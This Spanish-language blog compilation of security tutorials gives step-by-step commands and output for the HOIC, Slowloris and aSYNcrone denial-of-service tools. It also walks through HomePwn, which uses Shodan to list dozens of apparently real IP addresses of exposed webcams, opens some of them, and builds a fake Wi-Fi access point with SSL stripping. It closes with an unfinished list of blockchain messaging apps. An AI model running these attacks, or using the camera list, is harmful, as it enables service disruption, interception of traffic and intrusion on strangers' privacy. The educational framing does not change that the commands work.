CÓMO VENDEN TUS DATOS PERSONALES LAS EMPRESAS POR SOLO 4 PESOS

datos personales

Datos personales.Explicamos como funciona el negocio de ventas de datos personales y bases de datos en América latina. Cómo la empresa vende nuestros datos personales por unos pocos centavos y así es como comienzan todas las estafas telefónicas.

PARTE 1 DE ESTAFA TELEFÓNICA

PARTE 2 DE ESTAFA TELEFÓNICA

HERRAMIENTAS PARA PROBAR SEGURIDAD CONTRA ATAQUES DOS

ataque de ddos

La denegación de servicio (DoS) es una variante de ataque muy popular que consiste en ralentizar la respuesta de una máquina o una dirección IP en específico; acorde a los especialistas en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS), existen decenas de vulnerabilidades conocidas para desplegar estos ataques, por lo que siguen siendo ampliamente utilizados por los hackers.

A continuación le mostraremos un listado con las herramientas de ataque DoS más populares. NOTA: No ejecute estas pruebas en sistemas de producción, este tutorial fue elaborado sólo con fines informativos y educativos.

High Orbit Ion Cannon (HOIC)

HOIC es la versión más reciente de LOIC Low Orbit Ion Cannon que se utiliza para atacar aplicaciones web. El usuario solo debe ingresar la dirección IP objetivo y seleccionar el número de los hilos, que son subprocesos que indican la cantidad de paquetes de datos que se enviarán durante el ataque, pudiendo generar gran daño.

Hemos probado esta herramienta en Windows 7 32 BIT Build Verison 7601. Especificaciones de hardware: CPU i5 7200 2.71 GHZ (Atacante – 10.10.11.17). Si el usuario establece una cantidad demasiado alta de hilos, HOIC se cerrará automáticamente.

Atacante – 10.10.11.17 =============== Víctima – 10.10.11.145

  • Descargar HOIC: https://sourceforge.net/projects/high-orbit-ion-cannon/
  • Antes de iniciar la prueba, deshabilite su antivirus
  • A continuación se muestra otra máquina ataque usando Windows 7 64 Bit 7600 (Víctima – 10.10.11.145). Para verificar el uso del ancho de banda, hemos utilizado BitMeter OS
  • Descargue BitMeter OS: https://codebox.net/pages/bitmeteros-downloads
  • Antes del ataque DoS podemos ver que la CPU y los recursos de la víctima funcionaban normalmente

Después de ejecutar DOS usando HIOC, podemos ver la utilización de la máquina víctima con HOIC

  • Arriba se muestra un gran ancho de banda en la máquina objetivo, lo que hace que la memoria RAM y el CPU no respondan, pues todos los recursos se usaron por el alto nivel de transferencia de ancho de banda, mencionan los expertos en hacking ético
  • También puede consultar las estadísticas de ethernet utilizando Netstat. Abra CMD como administrador. Escriba netstat -e
  • Estadísticas antes del ataque:

Después de comenzar el ataque, las estadísticas de la interfaz aumentaron debido al alto tráfico:

  • Las estadísticas de Ethernet muestran que el ancho de banda ha aumentado. Para comprobar el resto de estadísticas de la interfaz de las estadísticas de Ethernet, puede usar netstat –e

Slowloris

Slowloris es otra herramienta popular utilizada en ataques DoS, cuyos desarrolladores afirman es lenta pero efectiva. Slowloris está diseñado para enviar solicitudes HTTP al servidor objetivo, que se infesta de solicitudes GET., mencionan los expertos en hacking ético.

  • Para atacar usaremos Kali Linux 2018.4 amd64
  • Del lado de la víctima usaremos Windows 7 32 BIT Build Verison 7600 Especificaciones de hardware – CPU i5 7200 2.71 GHZ
  • Para verificar el estado de la víctima, usaremos Wireshark en la máquina atacada
  • Para usar Slowloris, Python debe estar instalado
  • Para instalar Slowloris, escriba sudo apt-get update
  • Luego escriba sudo apt-get install python
  • Escriba git clone https://github.com/gkbrk/slowloris.git
  • Escriba sudo cd slowloris y luego escriba chmod u+x setup.py
  • Escriba python setup.py install
  • Escriba python slowloris <dirección IP objetivo>
1234567891011121314root@kali:/home/iicybersecurity/slowloris# python slowloris.py 10.10.11.123[18-12-2019 00:18:22] Attacking 10.10.11.123 with 150 sockets.[18-12-2019 00:18:22] Creating sockets…[18-12-2019 00:18:22] Sending keep-alive headers… Socket count: 31[18-12-2019 00:18:37] Sending keep-alive headers… Socket count: 1[18-12-2019 00:18:52] Sending keep-alive headers… Socket count: 7[18-12-2019 00:19:07] Sending keep-alive headers… Socket count: 1[18-12-2019 00:19:22] Sending keep-alive headers… Socket count: 0[18-12-2019 00:19:37] Sending keep-alive headers… Socket count: 2[18-12-2019 00:19:52] Sending keep-alive headers… Socket count: 4[18-12-2019 00:20:07] Sending keep-alive headers… Socket count: 6[18-12-2019 00:20:22] Sending keep-alive headers… Socket count: 6[18-12-2019 00:20:37] Sending keep-alive headers… Socket count: 1[18-12-2019 00:20:52] Sending keep-alive headers… Socket count: 1
  • Después de ejecutar el comando anterior. Slowloris comenzará a enviar paquetes de datos a la dirección IP objetivo
  • Arriba ya hemos configurado Wireshark para analizar la red local
  • A continuación se muestra la recepción de mucho tráfico en la máquina víctima
  • La captura de pantalla anterior indica que Wireshark ha capturado la recepción de paquetes de datos. Slowloris tiene algún impacto en la máquina objetivo
  • Slowloris puede ser bloqueado fácilmente por la máquina objetivo
  • A continuación se muestra la lista de agentes de usuario, que Slowloris utiliza para atacar en el servidor web
list_of_sockets = []user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko","Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",]

ASYNCHRONE

Asynchrone envía paquetes SYN a la dirección IP o al servidor web objetivo, lo que consume los recursos del servidor web atacado y hace que no responda. aSYNchrone está escrito en C.

  • Para las pruebas hemos usado Ubuntu 18.04
  • Y en el lado de la víctima, utilizaremos Windows 7 32 BIT Build Verison 7601 Hardware Specs – CPU i5 7200 2.71 GHZ
  • Abra el terminal y escriba git clone https://github.com/fatih4842/aSYNcrone.git
1234567root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/fatih4842/aSYNcrone.gitCloning into 'aSYNcrone'remote: Enumerating objects: 24, done.remote: Counting objects: 100% (24/24), done.remote: Compressing objects: 100% (21/21), done.remote: Total 24 (delta 6), reused 11 (delta 2), pack-reused 0Unpacking objects: 100% (24/24), done.
  • Escriba cd aSYNchrone
  • Escriba gcc aSYNcrone.c -o aSYNcrone –lpthread
123456789101112root@ubuntu:/home/iicybersecurity/Downloads# cd aSYNcrone/root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# lsaSYNcrone.c  README.md  srcroot@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# gcc aSYNcrone.c -o aSYNcrone -lpthreadaSYNcrone.c: In function ‘bilgi’:aSYNcrone.c:158:20: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘long unsigned int’ [-Wformat=]printf("\n\nNumber of PACKETS: "YSL"%d"RESET" \t Attack Time: "YSL"%.2f"RESET" second \n\n"RESET, p_sayi, zaman_farki);^~~~~~~~~aSYNcrone.c:158:50: note: format string is defined hereprintf("\n\nNumber of PACKETS: "YSL"%d"RESET" \t Attack Time: "YSL"%.2f"RESET" second \n\n"RESET, p_sayi, zaman_farki);~^%ld
  • Después escriba ./aSYNcrone 80 10.10.11.145 21 1000
12345678910111213141516root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# ./aSYNcrone 80 10.10.11.145 21 1000 █████╗ ███████╗██╗   ██╗███╗   ██╗ ██████╗██████╗  ██████╗ ███╗   ██╗███████╗██╔══██╗██╔════╝╚██╗ ██╔╝████╗  ██║██╔════╝██╔══██╗██╔═══██╗████╗  ██║██╔════╝███████║███████╗ ╚████╔╝ ██╔██╗ ██║██║     ██████╔╝██║   ██║██╔██╗ ██║█████╗██╔══██║╚════██║  ╚██╔╝  ██║╚██╗██║██║     ██╔══██╗██║   ██║██║╚██╗██║██╔══╝██║  ██║███████║   ██║   ██║ ╚████║╚██████╗██║  ██║╚██████╔╝██║ ╚████║███████╗╚═╝  ╚═╝╚══════╝   ╚═╝   ╚═╝  ╚═══╝ ╚═════╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝ ┌┐ ┬ ┬  ╦╔═┌─┐┬─┐┌─┐┌─┐┬  ┌┬┐┌─┐┌─┐  ╔═╗┬ ┬┌┐ ┌─┐┬─┐  ╔╦╗┌─┐┌─┐┌┬┐├┴┐└┬┘  ╠╩╗├─┤├┬┘├─┤├┤ │  │││├─┤└─┐  ║  └┬┘├┴┐├┤ ├┬┘   ║ ├┤ ├─┤│││└─┘ ┴   ╩ ╩┴ ┴┴└─┴ ┴└─┘┴─┘┴ ┴┴ ┴└─┘  ╚═╝ ┴ └─┘└─┘┴└─   ╩ └─┘┴ ┴┴ ┴[+] IP_HDRINCL success![+] Attack has been started! Number of PACKETS: 7624174       Attack Time: 148.00 second
  • A continuación se muestra que el uso de ancho de banda por parte de la CPU era normal antes del ataque

Arriba se muestra que el ataque ha comenzado. Se puede ver un gran aumento en los recursos de las víctimas en Bitmeter OS. Investigadores de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) mencionan que estas herramientas son mejoradas por los hackers para generar más daño

Arriba se muestra el alto ancho de banda y el alto uso de CPU y RAM de la computadora objetivo

Fuente:https://noticiasseguridad.com/tutoriales/herramientas-para-probar-seguridad-contra-ataques-dos-tutorial-paso-por-paso/

PENTESTING BÁSICO SOBRE UN TELÉFONO MÓVIL

pentesting móvil

Android es el sistema operativo más popular en dispositivos móviles y ofrece múltiples opciones para maximizar la experiencia del usuario. Acorde a especialistas en hacking ético, muchos cambios en los dispositivos pueden realizarse después de rootear el dispositivo, aunque un smartphone con Android sin rootear también es realmente funcional. A continuación le mostraremos una aplicación de Android que funciona como un software de pentesting básico.

Empleando este software es posible realizar algunas tareas de escaneo de red básico como: verificar la dirección IP de destino de la aplicación web, rastrear el enrutamiento de cualquier sitio web, consulta Whois, dnslookup, netcat y muchas otras características propias del pentesting. Acorde a los expertos en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) Network Manager puede ser muy útil para comenzar en pentesting.

Network Manager muestra detalles básicos de IP

Network Manager ofrece muchas funciones para diagnosticar cualquier red local

Comenzando con Universal Scanner. Este escáner ofrece opciones como búsqueda de IP, búsqueda de DNS, analizador SSL/TLS, escáner de puertos, Whois, Traceroute

  • Hemos escaneado hack.me para mostrar cómo funciona el administrador de red. Para recopilar información básica de cualquier sitio web, puede usar Universal Scanner
  • Dicha información se puede utilizar en la fase de recopilación de información de pentesting
  • Recopilar detalles con whois
Detalles de Whois
  • Whois es el primer paso para conocer cualquier información sobre cualquier URL. Proporciona información sobre los detalles de registro del sitio web, el dominio de hosting, etc
  • Network Manager ofrece una opción para conectarse mediante SSH
  • Para las pruebas nos hemos conectado con el sistema Linux. Para la conexión, ingrese el nombre de usuario y la contraseña

Haga clic en conectar, posteriormente se iniciará la sesión del terminal

  • SSH se puede utilizar para acceder a cualquier servidor desde cualquier ubicación
  • Comprobación de la velocidad con el administrador de red

Verificar velocidad de red

  • Puede ser útil verificar la velocidad antes de usar Network Manager para recopilar información
  • Uso de Web Crawler en el administrador de red. Esto rastreará mucha información hasta que se detenga
  • Rastreador web que se requiere para encontrar errores en cualquier sitio web. El rastreador de sitios web muestra todos los enlaces externos, internos e incluso muestra las imágenes, archivos y scripts que se encuentran en el rastreo de sitios web
  • Encuentra el caché de arp. Esto ayuda a saber cuántos usuarios están conectados en la red
  • Arriba se muestran los usuarios conectados con sus direcciones MAC. El atacante puede recopilar direcciones MAC de la red y puede usarse en ataques de envenenamiento por ARP
  • Verifique la URL antes de abrirla en el navegador
  • Arriba se muestra que hackthissite.org es seguro para visitar. Para verificar cualquier URL sospechosa, los usuarios pueden usar la comprobación de URL de navegación segura
  • Análisis de SSL: verificar si la URL está protegida con SSL o no
  • Arriba se muestra la versión del certificado SSL con SSL Cipher
  • Otra opción es el escáner de puertos, que muestra los puertos abiertos de la URL de destino. Certifiedhacker.com se utiliza para realizar pruebas, mencionan los expertos en hacking ético
  • Arriba se muestran los puertos abiertos de certifiedhacker.com. Cuantos más puertos estén abiertos, más sitio web puede ser vulnerable
  • La calculadora de IP también se puede utilizar para proporcionar información sobre cuántos usuarios puede manejar una red

La captura de pantalla anterior hace referencia a 254 direcciones disponibles, mencionan los especialistas en hacking ético

¿CÓMO HACKEAR Y AUDITAR DISPOSITIVOS IOT (INTERNET DE LAS COSAS)?

IOT

El Internet de las Cosas (IOT) facilita muchas de nuestras actividades cotidianas. Esta tecnología permite controlar cualquier dispositivo con conexión a Internet usando sólo nuestros smartphones (ya sean de Android o iOS) o una simple interfaz web; no obstante, acorde a expertos en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS), la tecnología IOT aún cuenta con muchas deficiencias de seguridad, por lo que estos dispositivos son fácilmente hackeables.

A continuación se muestra HomePwn, una herramienta para controlar, detectar e incluso recopilar información para hackear dispositivos IOT, muy útil en fases iniciales de pentesting. Acorde a los expertos en hacking ético de IICS, la biblioteca predeterminada de esta herramienta puede rastrear gran cantidad de dispositivos IOT para realizar pruebas de penetración.

  • Para las pruebas hemos usado Ubuntu 18.04 amd64
  • Se requiere de python3.6
  • Escriba sudo apt-get update && sudo apt-get install python3 && sudo apt-get install python3-pip
  • Escriba git clone https://github.com/ElevenPaths/HomePWN.git
  • Escriba cd HomePwn && ls
  • Escriba chmod u+x require.txt && homePwn.py
  • Escriba sudo ./install.sh; tomará tiempo instalar todas sus dependencias
  • Si faltan algunas dependencias, intente ejecutar install.sh de dos a tres veces
  • Escriba source homePwn/bin/activate
  • Después de completar los pasos anteriores, escriba python3 homePwn.py
(homePwn) [email protected]:/home/iicybersecurity/Downloads/HomePWN# python3 homePwn.py
 ('-. .-.             _   .-')       ('-.     _ (`-.   (`\ .-') /`     .-') _
( OO )  /            ( '.( OO )_   _(  OO)   ( (OO  )   `.( OO ),'    ( OO ) )
,--. ,--. .-'),-----. ,--.   ,--.)(,------. _.`     \,--./  .--.  ,--./ ,--,'
|  | |  |( OO'  .-.  '|   `.'   |  |  .---'(__...--''|      |  |  |   \ |  |\
|   .|  |/   |  | |  ||         |  |  |     |  /  | ||  |   |  |, |    \|  | )
|       |\_) |  |\|  ||  |'.'|  | (|  '--.  |  |_.' ||  |.'.|  |_)|  .     |/
|  .-.  |  \ |  | |  ||  |   |  |  |  .--'  |  .___.'|         |  |  |\    |
|  | |  |   `'  '-'  '|  |   |  |  |  `---. |  |     |   ,'.   |  |  | \   |
`--' `--'     `-----' `--'   `--'  `------' `--'     '--'   '--'  `--'  `--'

       ☠ HomePwn - IoT Pentesting & Ethical Hacking ☠

      Created with ♥  by: 'Ideas Locas (CDO Telefonica)'

                      Version: '0.0.1b'
homePwn >>
  • Escriba load y luego presione TAB. Ahora probaremos algunos de los módulos de HomePwn

Encontrar cámaras IP

  • Utilizaremos el módulo ipcamera; escriba load shodan/ipcamera
homePwn >>load shodan/ipcamera
 Loading module…
 [+] Module loaded!
 homePwn (shodan/ipcamera) >>
  • Escriba show oprtions
homePwn (shodan/ipcamera) >> show options
  Options (Field = Value)
 
 |
  |_[REQUIRED] apishodan  = None (Shodan API Key)
  |_file = ./files/shodan_camera.txt  (File to dump or read the data)
  |_search = Server: Netwave IP Camera 200 OK  (Camera to search)
  • Escriba set apishodan <Shodan API Key>
  • Escriba set apishodan atjc###############4xBjrrM
  • Escriba set file /home/iicybersecurity/ipcamera.txt
  • Escriba set search Axis Camera && run
homePwn (shodan/ipcamera) >> set apishodan atjc###############4xBjrrM
 apishodan >> atj####################4x###rrM
homePwn (shodan/ipcamera) >>
homePwn (shodan/ipcamera) >> set file /home/iicybersecurity/ipcamera.txt
 file >> /home/iicybersecurity/ipcamera.txt
homePwn (shodan/ipcamera) >>
homePwn (shodan/ipcamera) >> set search Axis Camera
 search >> Axis Camera
homePwn (shodan/ipcamera) >>
homePwn (shodan/ipcamera) >> run
 Making request to Shodan. Search: Axis Camera 200 OK
 [+] Data collected!
 [+] Saving information in /home/iicybersecurity/ipcamera.txt
  • Escriba exit
  • Ahora ejecute cat /home/iicybersecurity/ipcamera.txt
[email protected]:/home/iicybersecurity# cat ipcamera.txt
 72.46.55.91:8081     - Lincoln(United States)
 114.67.66.143:9000   - China
 71.81.18.38:8081     - Hoschton(United States)
 95.126.179.83:9001   - Spain
 87.53.191.140:8081   - Frederiksberg(Denmark)
 75.74.95.74:2000     - Homestead(United States)
 191.13.150.127:8081  - Sao Paulo(Brazil)
 93.39.181.213:9002   - Florence(Italy)
 12.217.219.67:2000   - Mckinney(United States)
 188.2.103.49:9001    - Novi Sad(Serbia)
 62.254.149.26:8081   - Poole(United Kingdom)
 166.161.54.247:8083  - United States
 166.161.54.247:8081  - United States
 86.85.24.45:5001     - Eindhoven(Netherlands)
 82.64.29.88:8083     - France
 166.251.134.252:8083 - United States
 76.0.120.19:2000     - Copperas Cove(United States)
 68.112.55.130:2000   - Hickory(United States)
 213.60.211.151:9000  - Orense(Spain)
 84.124.168.111:8083  - Hellín(Spain)
 185.62.151.139:8083  - Germany
 88.2.197.210:8081    - Espera(Spain)
 213.93.195.117:8181  - Alkmaar(Netherlands)
 104.244.26.200:9002  - San Francisco(United States)
 128.127.19.198:8009  - Épinay-sur-seine(France)
 213.162.94.8:8140    - Austria
 185.119.44.97:8081   - Amstetten(Austria)
 104.244.194.130:8083 - Rochester(United States)
 80.15.164.219:8083   - Paris(France)
 24.199.182.182:8083  - Wilmington(United States)
 24.199.182.182:8081  - Wilmington(United States)
 87.147.211.98:8083   - Monchengladbach(Germany)
 116.87.110.159:8081  - Singapore(Singapore)
 24.253.12.164:9001   - Henderson(United States)
 153.220.207.189:2087 - Kawasaki(Japan)
 72.214.64.217:9000   - Suffolk(United States)
 93.194.6.45:8081     - Rotenburg(Germany)
 87.139.180.12:5001   - Friedrichsthal(Germany)
 91.143.34.69:8083    - Odintsovo(Russian Federation)
 144.178.135.71:8081  - Chiclana De La Frontera(Spain)
 198.182.205.201:8083 - Shreveport(United States)
 88.190.82.68:8081    - Paris(France)
 87.245.160.250:8081  - Mytishchi(Russian Federation)
 71.34.134.124:444    - Colorado Springs(United States)
 85.66.239.195:8089   - Tabajd(Hungary)
 87.81.2.203:8081     - Leicester(United Kingdom)
 77.237.141.141:8181  - Bolevec(Czech Republic)
 84.142.101.232:8083  - Velten(Germany)
 148.56.6.24:8081     - Monzón(Spain)
 61.26.16.29:5001     - Koganei(Japan)
 37.209.104.88:9002   - Gomaringen(Germany)
 77.119.227.125:2000  - Krems An Der Donau(Austria)
 70.169.10.36:9000    - Chesapeake(United States)
 91.192.93.38:8081    - Moscow(Russian Federation)
 91.223.240.52:8081   - France
 201.27.176.30:8081   - Sao Paulo(Brazil)
 93.229.6.39:8081     - Germany
 71.183.194.38:8009   - Brooklyn(United States)
 90.152.193.37:8009   - Austria
 204.251.179.2:8083   - United States
 95.62.82.184:5001    - A Coruña(Spain)
 188.107.239.126:9000 - Bad Salzuflen(Germany)
 109.150.12.10:8083   - Bristol(United Kingdom
  • Arriba se enumeran las cámaras IP detectadas por HomePwn utilizando la API Shodan
  • Ahora tomaremos una IP del archivo txt anterior e intentaremos abrir una IP de cámara web de la lista. Abra el navegador y escriba 87.245.160.250:8081

Ahora intentemos con otra IP; abra el navegador y escriba 37.209.104.88:9002

  • Puede usar HomePwn con Shodan API para encontrar cámaras IP abiertas. Algunas ocasiones Shodan arrojará resultados de inmediato, otras podrá tomar más tiempo acceder a uno de estos dispositivos

Crear puntos de acceso falsos

  • Escriba load wifi/setup-accesspoint
  • Ahora escriba iwconfig para acceder al nombre de interfaz inalámbrica, que será necesario para el siguiente comando
  • Para ejecutar en la interfaz inalámbrica, escriba set ap_iface wlxc04a0016044d
  • Ahora configure otra interfaz en la cual se conecte a Internet, puede obtener esta interfaz con el comando ifconfig. Después de obtener el nombre de Internet con este comando, escriba set net_iface ens33
  • Ahora configure SSID usando el comando set ssid testing
  • Escriba run
homePwn (wifi/access-points) >> load wifi/setup-accesspoint
 Loading module…
 [+] Module loaded!
 homePwn (wifi/setup-accesspoint) >>
 homePwn (wifi/setup-accesspoint) >> show options
  Options (Field = Value)
 
  |[REQUIRED] ap_iface  = None (The name of your wireless interface (for the AP))  |[REQUIRED] net_iface  = None (The name of your internet connected interface)
  |channel = 3  (Network Channel to the AP)  |_sslstrip = True (Use SSLSTRIP 2.0?)  |_hostapd_wpa = True (Enable WPA2 encryption?)  |_wpa_passphrase = 12345678 (Please enter the WPA2 passphrase for the AP ('minimum 8 characters'))  |_driftnet = False (Capture unencrypted images with DRIFTNET?)  |[REQUIRED] ssid  = None (AP SSID to show)
  |_wireshark = False (Start Wireshark?)
  |_tshark = False (Capture packets to .pcap with TSHARK? (no gui needed))
  |_dnsspoof = False (Spoof DNS?)
  |_proxy = False (Capture traffic? (only works with no sslstrip))

 homePwn (wifi/setup-accesspoint) >> set ap_iface wlxc04a0016044d
 ap_iface >> wlxc04a0016044d
 homePwn (wifi/setup-accesspoint) >>
 homePwn (wifi/setup-accesspoint) >> set net_iface ens33
 net_iface >> ens33
 homePwn (wifi/setup-accesspoint) >>
 homePwn (wifi/setup-accesspoint) >>
 homePwn (wifi/setup-accesspoint) >> set ssid testing
 ssid >> testing
 homePwn (wifi/setup-accesspoint) >>
 homePwn (wifi/setup-accesspoint) >>
 homePwn (wifi/setup-accesspoint) >> run
  • Homepwn ofrece una manera fácil de crear puntos de acceso falsos. Tales métodos se pueden usar en técnicas como el secuestro de sesión
  • Después de crear un punto de acceso falso, debe iniciar la conexión para recibir paquetes de datos habilitando el reenvío de IP. Tales escenarios son parte del curso de hacking ético impartido por el Instituto Internacional de Seguridad Cibernética (IICS)
  • En otro terminal, escriba sudo sysctl net.ipv4.ip_forward = 1 para reenviar la dirección IPv4
  • Finalmente, puede usar Wireshark para ver la transmisión de datos
  • Arriba se muestra una víctima que se ha conectado usando un dispositivo Xiaomi. También podemos ver paquetes con dirección MAC de dispositivos Xiaomi. Por razones de seguridad, hemos ocultado la dirección MAC

WiFi sniff

  • Para iface, abra otra terminal y escriba iwconfig
[email protected]:/home/iicybersecurity# iwconfig
 wlxc04a0016044d  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:off
 ens33     no wireless extensions.
 lo        no wireless extensions.
  • Escriba load wifi/access-points-sniffing
  • Escriba show options
  • Luego escriba set iface wlxc04a0016044d
  • Finalice escribiendo run
homePwn (wifi/access-points-sniffing) >> load wifi/access-points-sniffing
 Loading module…
 [+] Module loaded!
 homePwn (wifi/access-points-sniffing) >> show options
  Options (Field = Value)
 |[REQUIRED] iface  = None (Network Interface (that allows promiscuous mode))  |[OPTIONAL] channel = None (Network channel. Configure this option if you want to fix it and not 'make jumps')
 homePwn (wifi/access-points-sniffing) >> set iface wlxc04a0016044d
 iface >> wlxc04a0016044d
homePwn (wifi/access-points-sniffing) >> run
  • Encontrará puntos de acceso WiFi cercanos que se pueden usar para en la detección (sniff) de WiFi o para secuestrar sesiones
[+] wlxc04a0016044d channel: 2
      Access Points    Enc  ch   ESSID
[*] 00:E0:##:3B:##:08 - Y - 2  - Cbi
[*] 18:##:F7:##:27:##C - Y - 1  - [email protected]
[*] ##:3A:##:0B:##:08 - Y - 2  - naidus
[*] E2:##:BF:##:DC:## - Y - 2  - DIRECT-yT-BRAVIA
[*] ##:95:##:BB:##:48 - Y - 4  - [email protected] baba
[*] 0C:##:B5:##:B0:## - Y - 4  - MohanLalchug
[*] ##:1E:##:DB:##:C0 - Y - 6  - Excitel
  • Arriba puede ver algunos puntos de acceso con su ESSID. Puede usar este módulo para detectar otras redes o buscar puntos de acceso de larga distancia. Aquí usará una smart TV Direct-yt-Bravia que será usada para detectar la IP; respecto a la televisión IP,  puede ser cualquier modelo de cualquier fabricante, como Samsung, LG, SONY, entre otros

ESCANEO DE PUERTOS

  • Homepwn también ofrece escaneo de puertos. Escriba load discovery/nmap-portscan
  • Escriba show options
  • Ahora escriba set rhost 137.74.187.100
  • Escriba set rports 50-500 para escanear desde el puerto 50 al 500
  • Finalmente escriba run
12345678910111213141516homePwn (discovery/nmap-portscan) >> show optionsOptions (Field = Value)  |[REQUIRED] rhost  = None (Remote host IP)  |[REQUIRED] rports  = None (Remote ports (Example: 100-500))|_timeout = 6  (Timeout to wait for search responses. (In seconds))|_scan = S  (nmap scan. Check namp scans to configure (Examples: SYN = S; Connect = T) ("show info" to check more))homePwn (discovery/nmap-portscan) >> set rhost 137.74.187.100rhost >> 137.74.187.100homePwn (discovery/nmap-portscan) >> set rports 50-500rports >> 100-500homePwn (discovery/nmap-portscan) >> runScanning…Host stateup'tcp'
  • Puede usar este módulo para buscar puertos abiertos de su host de destino

5 APPS DE MENSAJERÍA BASADAS EN BLOCKCHAIN

app con blockchain

A pesar de que la tecnología blockchain fue diseñada principalmente para su aplicación en el sector financiero con el uso de las criptomonedas, su constante evolución ha permitido que se emplee para registrar datos confidenciales, crear contratos inteligentes y apps descentralizadas, aseguran especialistas en seguridad informática.

Los esfuerzos para desarrollar apps descentralizadas se han enfocado en la creación de servicios de mensajería completamente libres. Si bien algunos servicios de mensajería, como Telegram o WhatsApp, cuentan con cifrado para protección del usuario, estas apps están centralizadas, y su mantenimiento, actualizaciones y modificaciones dependen completamente de una entidad ajena a los usuarios, por lo que un servicio de mensajería completamente libre forzosamente tendría que ser gracias a una app descentralizada.

El siguiente es un listado de cinco aplicaciones de mensajería descentralizada que garantizan completo anonimato y privacidad.

DUST

Desarrollada por la compañía Radical App, Dust opera bajo la premisa de recompensar a los usuarios de buen comportamiento y reprender a quienes hagan mal uso de la plataforma. El plan es que cada usuario consiga tokens para emplear en la plataforma, los cuales serán más costosos para los usuarios abusivos, además los usuarios con buen comportamiento podrán recompensar a otros. Otra característica de Dust es la notificación de captura de pantalla, por lo que este servicio no deja cabos sueltos en términos de seguridad informática y privacidad.

BECAUSE COMMUNICATION MATTERS (BMC)

Este servicio incluye anonimato, cifrado de extremo a extremo y múltiples medidas para garantizar la privacidad de sus usuarios. A diferencia de otros servicios, cada mensaje enviado a través de BCM está protegido con cifrado de extremo a extremo, por lo que nadie más en el servidor puede acceder al contenido de una conversación. Además, sus creadores aseguran que BMC pronto se convertirá en un desarrollo de código abierto. Algunos especialistas en seguridad informática afirman que este servicio es ampliamente utilizado por los miembros de ISIS.

STATUS

Los mensajes en la aplicación están encriptados de extremo a extremo, además, para eliminar cualquier rastro de actividad, Status cuenta con un navegador privado incorporado, por lo que no queda absolutamente ningún registro de los sitios web que el usuario visita. Aún se encuentra en fase de pruebas beta, pero los entusiastas del blockchain ya consideran a Status como una de las mejores soluciones de mensajería, navegación y transacción de criptomoneda en el mundo de las apps descentralizadas, todo en un mismo servicio.

E-CHAT

